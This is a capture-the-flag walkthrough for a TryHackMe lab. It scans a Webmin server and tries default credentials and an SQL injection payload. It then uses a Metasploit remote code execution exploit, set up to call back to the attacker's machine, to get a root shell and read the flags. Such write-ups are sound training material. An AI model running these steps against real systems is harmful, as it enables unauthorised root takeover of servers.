Difficulty: Easy
Room link: https://tryhackme.com/room/source
Hi all, its the F1ash, and this is the walkthrough for the TryHackMe room, Source. This room is about exploiting a recent vulnerability to hack Webmin, a web-based system configuration tool.
So lets get started.
Machine IP: 10.10.159.186
Enumeration
I will use rustscan to enumerate the open ports and services, as one of its advantages is that it is faster than a traditional nmap scan.
rustscan -a 10.10.159.186 -b 65535 -- -A is the command that I used, and the open ports are found to be 22(SSH) and 10000(MiniServ 1.890 (Webmin httpd)). So port 10000 is a Webmin port. Lets see if we can go and visit the webmin page.
http://10.10.159.186:10000 gives an error as below:
It says that the web server is running in SSL mode. So lets try to go to https://10.10.159.186:10000 instead. We can see this time it displays a webmin login page:
Exploit
I tried a few common default credentials like admin:admin , admin:password , root:root but none worked. I tried simple SQLi payloads like 'or '1' = '1 but that didnt work. And while trying it landed on a page saying I tried too many bad passwords, and access was denied for my host. However, I was not locked out for a long amount of time. I was able to access the page again. This time I decided to look into the Webmin version information that we got from Nmap and then see if there is an exploit available for that version.
Using searchsploit to find the exploit using searchsploit webmin 1.890 gives us a potential exploit we can use:
Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit) | linux/webapps/47330.rbIt seems there is a metasploit exploit for the webmin version that we have.
Lets open up metasploit using msfconsole and find that exploit.
We can do search 1.920 in metasploit to get the exploit, and use the only exploit that we are able to find. Then, we can see the options with show options .
In the options, we will need to set LHOST to our attacking machine IP, (set LHOST <attack_machine_ip> ), RHOSTS to the victim machine IP and SSL as true, and then just run the exploit.
And it works, and we seem to have gotten a shell, in fact, it is a root shell! We can upgrade the shell using python -c "import pty; pty.spawn('/bin/bash');" and we see that we are actually root.
Since we are actually root, we can go ahead and get both the user.txt and root.txt flags.
There is only one user directory in the home directory, dark , and it contains the user.txt flag.
Similarly, we can get the root.txt flag from the /root directory. And that’s it, that’s all we needed!
Thanks to TryHackMe, and DarkStar1471 for creating this room!